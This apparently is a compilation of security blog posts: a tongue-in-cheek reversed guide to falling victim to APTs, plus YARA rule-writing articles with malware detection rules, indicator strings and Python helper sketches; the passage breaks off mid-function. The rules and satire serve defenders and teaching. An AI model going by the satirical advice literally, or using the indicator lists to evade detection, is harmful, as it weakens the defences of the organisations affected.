Web Proxy Event Analysis Cheat Sheet

The “Web Proxy Event Analysis Cheat Sheet” can help SOCs and security analysts classify proxy events (blocks, alerts). It is based on my own ideas and on many suggestions from experts who helped me collect detection ideas for this document.

You can download version 1.0 here.

We also recommend checking Sigma’s “proxy” section for detection rules that can be used to detect threats in web proxy logs or similar logs, as long as they contain web connection information (EDR, HIDS etc.).

 


How to Fall Victim to Advanced Persistent Threats

During the last four years, I worked on incident response teams for several large advanced persistent threat (APT) cases involving different German corporations. In this time, we developed methods and tools to detect compromised systems, and we planned and performed remediation. During these investigations, I noticed that certain circumstances increased the chance that a corporation would fall victim to advanced persistent threats. In this article I want to focus on favorable preconditions that nearly guarantee a successful APT attack.
The recommendations in this article were discussed and extended with the help of red team leaders and fellow CERT team members. The article is inspired by a book named “Anleitung zum Herzinfarkt” (“Guide to a Heart Attack”) by Bernhard Ludwig. This book provides serious guidance on how to increase the risk of dying from a heart attack at an early age. I found that this principle of a ‘humorous reversed guide’ could be useful for describing the typical pitfalls and mistakes that we regard as crucial for the development of advanced persistent threats. The aim is to help organizations that have not yet been hit by this type of attack.

Don’t Create Network Segments

First, strictly avoid placing systems in different network segments. Instead, keep it simple. Let standard Windows workstations, admin workstations, server systems, print servers, industrial control systems, backup servers, network management systems, monitoring servers, terminal servers, mobile management servers, development systems, IP cameras, house automation, and SIP telephones share a single huge network in order to avoid firewalling issues.
That principle also applies to subsidiaries and affiliates. After acquiring other companies, don’t waste time asking them to comply with your security policies. Save time and connect their network directly to your backbone! Make sure to allow any type of connection and create domain trusts as fast as possible to enable cross-domain resource access to your data center in Berlin from your user workstations in Brazil, as well as from the call center in Bangladesh.
If you are required to create network zones for some reason, interconnect these zones with mutual Windows domain trust relationships. (see Titanic as an example)
In order to maintain an environment of mutual trust and respect, never monitor the gateways between segments for port scanning, network sweeps, or other types of suspicious network activity. Also, please do not commit the new business unit to providing technical support in cases of suspicious activity and incident response.

Don’t Limit Privileged Account Usage

You trust your administrator, don’t you? So, let administrators use their privileged accounts to surf the web and read email while they are connected via SSH and RDP to their domain controllers and Internet facing servers in DMZ networks. Do not use hardened and intensely monitored jump servers from special admin workstations to manage your most important server networks.
Don’t waste precious resources creating administrative roles. If someone needs to install a text editor on a server, add him to the Domain Administrators group and make sure that no one ever figures out why you did this.
Do not use Microsoft’s LAPS solution to ensure that all computers have different, complex local administrator passwords, and do not use Privileged Access Workstations (PAW) to provide a dedicated operating system for sensitive tasks. This would give attackers an unnecessarily hard time finding highly privileged credentials and fewer opportunities to use them.

Don’t Collect and Analyze Useful Log Data in a Central Location

Attackers tend to make themselves familiar with the environment and therefore cause strange peaks in log volumes that could be easily detected by an over-attentive employee – so, don’t log security events. If you do log events for any reason, make sure that all of your systems keep their logs in a local log file and do not transmit them to a central SIEM system.
If you have to use a SIEM system, use Active Directory for authentication, so that attackers can find all the fine log data in one central place. If you have any problems on a server, such as running out of disk space because you configured your golden image for Windows servers to use only 20GB on drive ‘C:’, don’t hesitate to reduce the log file size to a minimum. That may cause the log to overwrite itself every 30 minutes, but hey, each line that is overwritten can help prevent successful detection.
On Linux systems, configure your log file rotation to keep 7 days, not more. Your IT staff typically needs a couple of days to identify the system owner and to have a meaningful discussion with your data protection officer.
If you have to comply with certain policies that require the collection of log data, you can still do a lot to make sure that breaches remain undetected for months. Here is our Top 10:

  1. Only log and report high numbers of failed logins, because attackers tend to use valid credentials after taking the first hop.
  2. Disregard all antivirus events that have the status “deleted” or “moved to quarantine”. They are gone, so they won’t trouble you.
  3. Do not collect the logs of client workstations to avoid detecting zero-day attacks. Detecting them would cause pressure to take action.
  4. Do not search for anomalies in your log files because hacker activities generate some very special or completely new log types. If you look for them you could find them – so again, don’t do that.
  5. Only collect log files at the system level and disregard the logs of the applications running on top of it.
  6. Do not spend time understanding your organization’s structure, logging completeness, and logging behavior of your assets. It’s usually pretty complex and the less you know the better.
  7. Use the default logging configuration on your systems. Maybe you miss the most relevant event types, but if they really were relevant, wouldn’t they be in the default anyway?
  8. Monitor and report attacks on your Internet-facing firewall to tie up valuable resources with useless pie charts.
  9. Do not collect the logs of SysInternals Sysmon, AppLocker, Windows Defender, or Microsoft EMET. The protection provided from their use, especially when combined, is far too effective.
  10. Let the data protection officers and workers’ council decide on what you’re allowed to log and analyze.

Use your Active Directory for All Types of Authentication

Centralization is good. It saves resources and simplifies user administration. Use Active Directory authentication for everything: the logins to your proxy servers, network devices, online certificate authorities, virtual machine consoles, administrative jump hosts, security monitoring servers, VPN servers, SIEM system, and last but not least – backup servers.
This ensures that attackers take over the complete infrastructure after compromising a single outdated member server that has domain admin logon sessions. Remediation becomes much more exciting when attackers have access to proxies, DNS servers, and mail gateways all at once!

Don’t Regard the Client Workstations as the First Line of Defense

Since corporate workstations operate deep inside the internal network, well protected by several firewalls and proxy servers, consider them far outside the danger zone. Don’t audit them as frequently as your DMZ servers. There are so many more clients than servers that it is certainly not efficient to scan them all. Also, random samples never give a valid result, so let’s just drop the whole thing.
Don’t patch workstation software such as Microsoft Office, PDF viewers, Java and Flash plugins, media players, and archivers as soon as a patch is published. Don’t use exploit protection like Microsoft EMET, so that the risk of zero-day attacks increases. And finally, don’t deactivate active content in document viewers, such as JavaScript in Acrobat Reader or VBA in Microsoft Office.
Simplify administration of user workstations by granting standard users local administrative rights.
Also allow workstations to access the Internet directly on any service port. Don’t use a proxy server, and do not monitor dropped connections on typical Trojan back-connect ports. Developers and administrators are highly skilled professionals who tend to download and install suspicious software from the shadiest websites. Remember: you trust them, and if they think that they need that (suspicious) software, then of course they do. To increase the probability of such events, block SourceForge, GitHub, and the whole “Software Downloads” category on your Internet proxy server.

Don’t Mind Antivirus Alerts

As mentioned before, do not consider antivirus alerts that have the status “deleted”, “cleaned”, or “moved to quarantine”. A deeper analysis of these events could reveal a Trojan that had control of the system for weeks before the right signature finally matched components of a hack tool set that the attackers moved from server to server. Therefore, only check for errors and unresolved operational issues.
Make sure that no one pays special attention to antivirus events that report “Hack Tools”, “Password Dumpers”, or “Scanners”. Tell everyone that this would cause too many false positives because system administrators need these tools to find their assets and regain access to them.
Also avoid rating antivirus events according to an evaluation method. That’s so bureaucratic.
To allow attackers the greatest possible leeway, create vast exclusion lists and don’t use special Antivirus functions like PUA scanning or application controls that block password dumpers from accessing the memory.

Handle Web Servers Like Other Server Types

Regard web servers like any other server type. Frequently patching the web server service is perfectly sufficient. Do not audit the applications running on that web server; if you have to due to corporate policies, do it once, print the report, and archive it.
Place the web servers behind reverse proxy servers and tell everyone that this will protect them. If you repeat that constantly everyone will believe it one day. Do not protect the web servers with costly Web Application Firewalls and don’t collect the logs of such a system for central attack detection and analysis.
Allow developers to access the management interfaces, like JMX or Tomcat Manager, from remote locations. Don’t log access to these applications and don’t ban source IPs on security violations. Tell everyone that each developer may access the servers anytime, from anywhere, to reduce operational risks.
If you have to run Apache or Tomcat on a server, choose Windows as the operating system. Do not use limited user accounts to run the web server services in order to maximize the impact of a successful attack. Last but not least: Avoid annoying security features like SELinux.

A Few Last Words

I know that it is hard to guarantee a successful APT attack and that all of these recommendations require a certain amount of stubbornness and resistance to advice; however, even if this advice does not guarantee falling victim to advanced persistent threats, chances increase exponentially the more of my advice you apply. Good luck – I’ll keep my fingers crossed.
If you have further ideas that you want to share, please comment on this article or contact me on Twitter @cyb3rops.

Credits

Many thanks to Stephan Kaiser for the idea, Julia Stolz and Jeff for major reviews and Matthias Kaiser (@matthias_kaiser), Daniel Sauder (@DanielX4v3r), Thomas Patzke (@blubbfiction), Claas Rettinghausen, Robert Haist (@SleuthKid), Alexander Döhne for their valuable feedback.

How to Write Simple but Sound Yara Rules – Part 3

It has been a while since I wrote “How to Write Simple but Sound Yara Rules – Part 2”. Since then, I have changed my rule creation method to generate more versatile rules that can also be used for in-memory detection. Furthermore, new features were added to yarGen and yarAnalyzer.

Binarly

The most important feature of the upcoming yarGen YARA Rule Generator release is the Binarly API integration.
Binarly is a “binary search engine” that can instantly search for arbitrary byte patterns across the contents of tens of millions of samples. It allows you to quickly get answers to questions like:

  • “What other files contain this code/string?”
  • “Can this code/string be found in clean applications or malware samples?”


Binary Search Engine – Binar.ly


This means that you can use Binarly to quickly verify the quality of your YARA strings.
Furthermore, Binarly has a YARA file search function, which you can use to scan their entire collection (currently 7.5+ million PE files, 3.5M of them clean, over 6TB) with your rule in less than a minute.
For yarGen I integrated their API from https://github.com/binarlyhq/binarly-sdk.
To use it, you just need an API key, which you can get for free by contacting them at contact@binar.ly. They are looking for researchers interested in testing the service. Free accounts are limited to 10,000 requests per day, which is plenty. yarGen uses between 50 and 500 requests per sample during rule generation.
The following screenshot shows Binarly lookups in yarGen’s debugging mode. You can see that some of the strings produce a pretty high score. This score is added to the total score, which decides whether a string gets included in the final YARA rule. Generating the score from the Binarly results is more complex than it might seem. For example, I had to score down strings that had 3,000+ malware matches but also 1,000 goodware matches. Goodware matches carry more weight than malware matches: a string could have 15,000+ malware matches, but if it also appears in 1,000 goodware files, it is not a good YARA rule string. I also handled cases in which small result sets led to high Binarly scores.
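To make the weighting idea concrete, here is a minimal Python sketch (yarGen itself is written in Python) of a score that punishes goodware matches harder than it rewards malware matches and damps small result sets. This is not yarGen’s actual formula. The function name `hypothetical_string_score` and the defaults `goodware_weight=20`, `min_results=10` and `scale=30` are illustrative assumptions.

```python
def hypothetical_string_score(malware_hits: int, goodware_hits: int,
                              goodware_weight: float = 20.0,
                              min_results: int = 10,
                              scale: float = 30.0) -> float:
    """Illustrative score for one candidate string based on search-engine hit counts.

    All defaults are arbitrary assumptions, not the values used by yarGen.
    """
    total = malware_hits + goodware_hits
    if total == 0:
        return 0.0  # no evidence either way
    # Each goodware match counts as much as `goodware_weight` malware matches,
    # so 15,000 malware hits plus 1,000 goodware hits still ends up negative.
    balance = (malware_hits - goodware_weight * goodware_hits) / total
    # Damp small result sets so that a handful of malware-only hits
    # cannot produce a top score.
    confidence = min(1.0, total / min_results)
    return round(scale * balance * confidence, 2)


if __name__ == "__main__":
    for hits in [(15000, 1000), (3000, 1000), (500, 0), (3, 0)]:
        print(hits, hypothetical_string_score(*hits))
```

The ratio form keeps the score bounded at `scale` for malware-only strings. A single clear goodware signal can push a string far into negative territory, which matches the intent described above.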

Binarly Service Lookup in yarGen 0.16


This is why the evaluation method that generates the score of each string has been further improved in the new version 0.16.0 of yarGen. Both the Binarly service and the new yarGen version are still in ‘testing’. Do not upgrade your local yarGen installation to v0.16b if you rely on the rule generation process. Follow me and Daniel Radu (Binarly) on Twitter to stay up-to-date.

Improved Rule Generation

But let’s talk about the improved rule generation process.
As described in my previous articles, I try to divide the list of strings generated by yarGen into two different groups:

  • Highly Specific Strings
    These strings include C2 server addresses, mutexes, PDB file names, tool/malware names (nbtscan.exe, iexp1orer.exe), tool outputs (e.g. keylog text output format), and typos in common strings (e.g. “Micosoft Corporation”)
  • Suspicious Strings
    These strings look suspicious and uncommon but may appear in some exotic goodware, dictionary libraries or unknown software (e.g. ‘/logos.gif’, ‘&PassWord=’, ‘User-Agent: Mozilla’). I’ve seen pigs fly: legitimate software contains the rarest strings.

In previous examples I always tended to combine these strings with the magic header and file size. yarGen 0.15 and older versions generated those rules by default. The problem with these rules is that they do not detect the malware or tools in process memory.
Therefore I changed my rule generation process and adjusted yarGen to follow that example. As I said before, yarGen is not designed to generate perfect rules. Its main purpose is to generate raw rules that require the least effort to complete and could also work without further modification.
The following image shows how new rules are composed. They contain two main conditions, one for the file detection and one for the in-memory detection. I tried to copy the manual rule generation process as far as possible.


YARA rule composition (manual composition and yarGen v0.16)


The statement that detects files on disk combines the magic header, the file size, and either one of the highly specific strings OR a set of the suspicious strings.
For the in-memory detection I omit the magic header and file size. Highly specific strings and suspicious strings are combined with a logical AND.
The different statements (manual rule creation) look like this:

/* Detects File on Disk */
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 4 of ($s*) ) )
or
/* Detects Malware/Tool in Memory */
( 1 of ($x*) and 4 of ($s*) )
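To show how the two branches behave, here is a minimal Python sketch that evaluates the same logic on a byte buffer. It assumes plain substring matching and ignores YARA modifiers such as `fullword`, `ascii` and `wide`. The function name `condition_matches` and its parameters are hypothetical.

```python
def condition_matches(data: bytes, x_strings: list, s_strings: list,
                      max_size: int = 100 * 1024, min_s: int = 4) -> bool:
    """Mimic: (MZ and filesize < 100KB and (1 of $x* or 4 of $s*)) or (1 of $x* and 4 of $s*)."""
    x_hits = sum(1 for x in x_strings if x in data)
    s_hits = sum(1 for s in s_strings if s in data)
    # File on disk: uint16(0) == 0x5a4d is the little-endian reading of "MZ",
    # plus the size limit, plus 1 of ($x*) OR min_s of ($s*)
    on_disk = (data[:2] == b"MZ" and len(data) < max_size
               and (x_hits >= 1 or s_hits >= min_s))
    # In memory: no header or size check, so demand 1 of ($x*) AND min_s of ($s*)
    in_memory = x_hits >= 1 and s_hits >= min_s
    return on_disk or in_memory


if __name__ == "__main__":
    x = [b"DATA_BEGIN:"]
    s = [b"s1", b"s2", b"s3", b"s4"]
    print(condition_matches(b"MZ" + b"DATA_BEGIN:", x, s))        # file on disk
    print(condition_matches(b"\x00\x00DATA_BEGIN: s1 s2 s3 s4", x, s))  # memory
```

The memory branch has no header and size restrictions, so it compensates by requiring both string groups at once.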

Here is an example of a rule produced by yarGen v0.16 (sample Unit 78020 – WininetMM.exe). It shows a ‘raw’ rule without further editing, with the ‘scores’ included as comments:

rule WininetMM {
    meta:
        description = "Auto-generated rule - file WininetMM.exe"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-04-15"
        hash1 = "bfec01b50d32f31b33dccef83e93c43532a884ec148f4229d40cbd9fdc88b1ab"
    strings:
        $x1 = ".?AVCWinnetSocket@@" fullword ascii /* PEStudio Blacklist: strings */ /* score: '40.00' (binarly: 30.0) */
        $x2 = "DATA_BEGIN:" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.89' (binarly: 27.89) */
        $x3 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '32.53' (binarly: 5.53) */
        $s4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* PEStudio Blacklist: strings */ /* score: '20.00' (binarly: -7.0) */
        $s5 = "Accept-Encoding:gzip,deflate/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.35' (binarly: -1.65) */
        $s6 = "/%d%s%d" fullword ascii /* score: '10.27' (binarly: 0.27) */
        $s7 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.36' (binarly: -13.64) */
        $s8 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide /* PEStudio Blacklist: strings */ /* score: '5.61' (binarly: -9.39) */
        $s9 = ".?AVCMyTlntTrans@@" fullword ascii /* score: '5.00' */
    condition:
        ( uint16(0) == 0x5a4d and filesize < 300KB and ( 1 of ($x*) and all of ($s*) ) ) or ( all of them )
}

You may ask: “Why do ‘DATA_BEGIN:’ and ‘.?AVCWinnetSocket@@’ have such high scores?” Well, that is exactly why analysts need the support of big data:
[Screenshots: Binarly lookups for both strings, taken 2016-04-15]
I have to add that Binarly offers two query modes (fast/exact), of which yarGen uses the ‘fast’ mode. An analyst who doubts the produced results would use the ‘exact’ query mode to verify them manually. Please ask Daniel about the details.

yarAnalyzer – Inventory Generation

The new version of yarAnalyzer can generate an inventory of your YARA rule sets. This feature comes in very handy when you have to handle a big set of rules. The ‘--inventory’ option generates a CSV file that can be prettied up in MS Excel or OpenOffice Calc.
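As a rough idea of what such an inventory contains, here is a minimal Python sketch that extracts rule names and a few quoted meta fields from rule text and writes them as CSV. It is not yarAnalyzer’s implementation or column layout. The regex-based parsing, the column list and the function names `inventory_rows` and `write_inventory` are assumptions. A real parser would use the YARA grammar rather than regular expressions.

```python
import csv
import io
import re

# "rule Name" at the start of a line, optionally preceded by private/global
RULE_RE = re.compile(r"^[ \t]*(?:(?:private|global)[ \t]+)*rule[ \t]+(\w+)", re.MULTILINE)
# Quoted meta values such as: description = "..."  (string definitions start with $ and are skipped)
META_RE = re.compile(r'^[ \t]*(\w+)[ \t]*=[ \t]*"([^"]*)"', re.MULTILINE)

FIELDS = ["rule", "description", "author", "date", "source"]


def inventory_rows(rule_text: str, source: str):
    """Yield one dict per rule found in rule_text (hypothetical column set)."""
    matches = list(RULE_RE.finditer(rule_text))
    for i, match in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(rule_text)
        meta = dict(META_RE.findall(rule_text[match.end():end]))
        yield {
            "rule": match.group(1),
            "description": meta.get("description", ""),
            "author": meta.get("author", ""),
            "date": meta.get("date", ""),
            "source": source,
        }


def write_inventory(rows, out) -> None:
    """Write the rows as CSV, ready to be opened in a spreadsheet."""
    writer = csv.DictWriter(out, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)


if __name__ == "__main__":
    sample = 'rule Demo {\n    meta:\n        description = "demo rule"\n    condition:\n        true\n}\n'
    buffer = io.StringIO()
    write_inventory(inventory_rows(sample, "demo.yar"), buffer)
    print(buffer.getvalue())
```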


yarAnalyzer Inventory

YARA Rules to Detect Uncommon System File Sizes

YARA is an awesome tool, especially for incident responders and forensic investigators. In my scanners I use YARA for anomaly detection on files. I have already written some articles on “Detecting System File Anomalies with YARA”, which focus on the expected contents of system files, but today I would like to focus on the size of certain system files.
I did a statistical analysis in order to rate a suspicious “csrss.exe” file and noticed that the size of the malicious file was far outside the typical range. I decided to do the same for other commonly abused file names, based on this blog post by @hexacorn.
I used my VT Intelligence access and burned some searches to create this list.

System Files and Sizes


You can find a spreadsheet of this list here. Everyone can edit it.
I created some YARA rules that require the external variable “filename” to work. LOKI and THOR set the “filename” variable and other external variables by default.
UPDATE 23.12.15 4:50pm:
I’ll update the list on the LOKI GitHub page. For a current version of the YARA signatures, visit this page.

rule Suspicious_Size_explorer_exe {
    meta:
        description = "Detects uncommon file size of explorer.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "explorer.exe"
        and ( filesize < 1000KB or filesize > 3000KB )
}
rule Suspicious_Size_chrome_exe {
    meta:
        description = "Detects uncommon file size of chrome.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "chrome.exe"
        and ( filesize < 500KB or filesize > 1300KB )
}
rule Suspicious_Size_csrss_exe {
    meta:
        description = "Detects uncommon file size of csrss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "csrss.exe"
        and ( filesize > 18KB )
}
rule Suspicious_Size_iexplore_exe {
    meta:
        description = "Detects uncommon file size of iexplore.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "iexplore.exe"
        and ( filesize < 75KB or filesize > 910KB )
}
rule Suspicious_Size_firefox_exe {
    meta:
        description = "Detects uncommon file size of firefox.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "firefox.exe"
        and ( filesize < 265KB or filesize > 910KB )
}
rule Suspicious_Size_java_exe {
    meta:
        description = "Detects uncommon file size of java.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "java.exe"
        and ( filesize < 140KB or filesize > 900KB )
}
rule Suspicious_Size_lsass_exe {
    meta:
        description = "Detects uncommon file size of lsass.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "lsass.exe"
        and ( filesize < 13KB or filesize > 45KB )
}
rule Suspicious_Size_svchost_exe {
    meta:
        description = "Detects uncommon file size of svchost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "svchost.exe"
        and ( filesize < 14KB or filesize > 40KB )
}
rule Suspicious_Size_winlogon_exe {
    meta:
        description = "Detects uncommon file size of winlogon.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "winlogon.exe"
        and ( filesize < 279KB or filesize > 510KB )
}
rule Suspicious_Size_igfxhk_exe {
    meta:
        description = "Detects uncommon file size of igfxhk.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-21"
    condition:
        uint16(0) == 0x5a4d
        and filename == "igfxhk.exe"
        and ( filesize < 200KB or filesize > 265KB )
}
rule Suspicious_Size_servicehost_dll {
    meta:
        description = "Detects uncommon file size of servicehost.dll"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "servicehost.dll"
        and filesize > 150KB
}
rule Suspicious_Size_rundll32_exe {
    meta:
        description = "Detects uncommon file size of rundll32.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "rundll32.exe"
        and ( filesize < 30KB or filesize > 60KB )
}
rule Suspicious_Size_taskhost_exe {
    meta:
        description = "Detects uncommon file size of taskhost.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "taskhost.exe"
        and ( filesize < 45KB or filesize > 85KB )
}
rule Suspicious_Size_spoolsv_exe {
    meta:
        description = "Detects uncommon file size of spoolsv.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "spoolsv.exe"
        and ( filesize < 50KB or filesize > 800KB )
}
rule Suspicious_Size_smss_exe {
    meta:
        description = "Detects uncommon file size of smss.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "smss.exe"
        and ( filesize < 40KB or filesize > 140KB )
}
rule Suspicious_Size_wininit_exe {
    meta:
        description = "Detects uncommon file size of wininit.exe"
        author = "Florian Roth"
        score = 60
        date = "2015-12-23"
    condition:
        uint16(0) == 0x5a4d
        and filename == "wininit.exe"
        and ( filesize < 90KB or filesize > 250KB )
}

I ran this rule set over my goodware database and got only a few false positives. Feel free to use these rules wherever you like, but please share new rules or statistical analyses of other system files.


False Positives
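All of the rules above follow one pattern: an MZ header, an exact file name, and a size outside a known range. The following minimal Python sketch expresses that pattern as a lookup table, for example for a quick pre-check outside of YARA. The bounds are copied from a subset of the rules above. The names `SIZE_RANGES` and `suspicious_size` are hypothetical, and in the real setup LOKI or THOR supply `filename` as a YARA external variable instead.

```python
KB = 1024  # YARA's KB suffix multiplies by 1024

# (lower, upper) bounds in KB taken from a subset of the rules above; None = no bound
SIZE_RANGES = {
    "explorer.exe": (1000, 3000),
    "csrss.exe": (None, 18),
    "lsass.exe": (13, 45),
    "svchost.exe": (14, 40),
    "rundll32.exe": (30, 60),
    "servicehost.dll": (None, 150),
}


def suspicious_size(filename: str, data: bytes) -> bool:
    """Return True if an MZ file with a known system file name has an uncommon size."""
    # uint16(0) == 0x5a4d: the file must start with "MZ"
    if data[:2] != b"MZ":
        return False
    # Exact, case-sensitive lookup, like filename == "..." in the rules
    bounds = SIZE_RANGES.get(filename)
    if bounds is None:
        return False
    low, high = bounds
    size = len(data)
    too_small = low is not None and size < low * KB
    too_large = high is not None and size > high * KB
    return too_small or too_large


if __name__ == "__main__":
    print(suspicious_size("svchost.exe", b"MZ" + bytes(20 * KB)))  # within 14-40KB
    print(suspicious_size("svchost.exe", b"MZ" + bytes(50 * KB)))  # larger than 40KB
```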

How to Write Simple but Sound Yara Rules – Part 2


Months ago I wrote a blog article on “How to write simple but sound Yara rules”. Since then, the techniques and tools mentioned there have improved. I’d like to give you a brief update on certain Yara features that I frequently use and on the tools I use to generate and test my rules.

Handle Very Specific Strings Differently

In the past I was glad to see very specific strings in samples and sometimes used them as the only indicator for detection. For example, whenever I found a certain typo in the PE header fields like “Micorsoft Corportation”, I cheered and thought that this would make a great signature. But, and I have to admit this now, it only makes a nice signature. Great signatures do not only match a certain sample in the most condensed way; they also aim to match similar samples created by the same author or group.
Look at the following rule:

rule Enfal_Malware_Backdoor {
    meta:
        description = "Generic Rule to detect the Enfal Malware"
        author = "Florian Roth"
        date = "2015/02/10"
        super_rule = 1
        hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
        hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
        hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
        score = 60
    strings:
        $x1 = "Micorsoft Corportation" fullword wide
        $x2 = "IM Monnitor Service" fullword wide
        $a1 = "imemonsvc.dll" fullword wide
        $a2 = "iphlpsvc.tmp" fullword
        $a3 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
        $s1 = "urlmon" fullword
        $s2 = "Registered trademarks and service marks are the property of their" wide
        $s3 = "XpsUnregisterServer" fullword
        $s4 = "XpsRegisterServer" fullword
    condition:
        uint16(0) == 0x5A4D and
        (
            ( 1 of ($x*) ) or
            ( 2 of ($a*) and all of ($s*) )
        )
}

When I review the 20 strings generated by yarGen, I sort them into 3 groups:

  • Very specific strings (one of them is sufficient for successful detection, e.g. IP addresses, payload URLs, PDB paths, user profile directories)
  • Specific strings (strings that look good but may appear in goodware as well, e.g. “wwwlib.dll”)
  • Other strings (these may even appear in goodware, but exclude random-looking code from compressed or encrypted data; e.g. “ModuleStart”)

Then I create a condition that defines:

  • A Certain Magic Header (remove it in case of ASCII text like scripts or webshells)
  • 1 of the very specific strings OR
  • some of the specific strings combined with many (but not all) of the common strings
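The condition scheme above can be written down as a small generator. Here is a minimal Python sketch that uses the `$x` (very specific), `$a` (specific) and `$s` (other) prefixes from the Enfal rule. The thresholds are arbitrary assumptions: half of the specific strings, and all but one of the other strings. The sketch does not reproduce the exact numbers in the rules shown here. The function `build_condition` is hypothetical, not part of yarGen.

```python
def build_condition(n_x: int, n_a: int, n_s: int, magic_header: bool = True) -> str:
    """Compose a YARA condition: $x = very specific, $a = specific, $s = other strings."""
    branches = []
    if n_x:
        # One very specific string is sufficient on its own
        branches.append("1 of ($x*)")
    if n_a and n_s:
        need_a = max(1, n_a // 2)   # "some" specific strings: half, at least one
        need_s = max(1, n_s - 1)    # "many but not all" others: all but one where possible
        branches.append(f"( {need_a} of ($a*) and {need_s} of ($s*) )")
    if not branches:
        raise ValueError("need very specific strings, or specific plus other strings")
    condition = "( " + " or ".join(branches) + " )"
    if magic_header:
        # Leave the header check out for ASCII files such as scripts or webshells
        condition = "uint16(0) == 0x5A4D and " + condition
    return condition


if __name__ == "__main__":
    print(build_condition(2, 3, 4))
    print(build_condition(1, 0, 0, magic_header=False))
```

With the string counts of the Enfal rule (2, 3, 4), the sketch would emit `uint16(0) == 0x5A4D and ( 1 of ($x*) or ( 1 of ($a*) and 3 of ($s*) ) )`. You would then tighten the numbers by hand, as in the rule above.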

Here is another example that has only very specific strings (x) and common strings (s):

rule Cobra_Trojan_Stage1 {
    meta:
        description = "Cobra Trojan - Stage 1"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/analysis-of-project-cobra.html"
        date = "2015/02/18"
        hash = "a28164de29e51f154be12d163ce5818fceb69233"
    strings:
        $x1 = "KmSvc.DLL" fullword wide
        $x2 = "SVCHostServiceDll_W2K3.dll" fullword ascii
        $s1 = "Microsoft Corporation. All rights reserved." fullword wide
        $s2 = "srservice" fullword wide
        $s3 = "Key Management Service" fullword wide
        $s4 = "msimghlp.dll" fullword wide
        $s5 = "_ServiceCtrlHandler@16" fullword ascii
        $s6 = "ModuleStart" fullword ascii
        $s7 = "ModuleStop" fullword ascii
        $s8 = "5.2.3790.3959 (srv03.sp2.070216-1710)" fullword wide
    condition:
        uint16(0) == 0x5A4D and filesize < 50000 and 1 of ($x*) and 6 of ($s*)
}

If you can’t create a rule that is sufficiently specific, I recommend the following methods to restrict the rule:

  • Magic Header (use it as first element in condition – see performance guidelines, e.g. “uint16(0) == 0x5A4D”)
  • File Size (malware that mimics valid system files, drivers or legitimate software often differs significantly in size; try to find the valid files online and set a size range in your rule, e.g. “filesize > 200KB and filesize < 600KB”)
  • String Location (see the “Location is Everything” section)
  • Exclude strings that occur in false positives (e.g. $fp1 = “McAfeeSig”)

Location is Everything

One of the most underestimated features of Yara is the ability to define a range in which strings must occur in order to match. I used this technique to create a rule that detects Metasploit Meterpreter payloads quite reliably, even if they are encoded or cloaked. How does that work?
If you see malware code hidden in an overlay at the end of a valid executable (e.g. “ab.exe”), and you only see strings that are typical function exports or that mimic a well-known executable, ask the following questions:

  • Is it normal that these strings are located at this location in the file?
  • Is it normal that these strings occur more than once in that file?
  • Is the distance between two strings somehow specific?


Malware Strings


For unspecific malware code in a PE overlay, try to define a rule that looks for a certain file size (e.g. filesize > 800KB) and for the malware strings relative to the end of the file (e.g. $s1 in (filesize-500..filesize)).
The following example shows an unspecified webshell containing strings that an attacker may modify in future versions deployed in a victim’s network. Always try to extract strings that are less likely to be changed.
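The three questions about location, repetition and distance can be checked quickly before writing the rule. Here is a minimal Python sketch that assumes plain byte-substring matching. `in_tail` roughly corresponds to YARA’s `$s in (filesize-window..filesize)`. The helper names `offsets`, `in_tail` and `distance` are hypothetical.

```python
def offsets(data: bytes, needle: bytes) -> list:
    """All (possibly overlapping) offsets of needle: is it normal that it occurs more than once?"""
    found = []
    pos = data.find(needle)
    while pos != -1:
        found.append(pos)
        pos = data.find(needle, pos + 1)
    return found


def in_tail(data: bytes, needle: bytes, window: int) -> bool:
    """Rough equivalent of: $s in (filesize-window..filesize)."""
    hits = offsets(data, needle)
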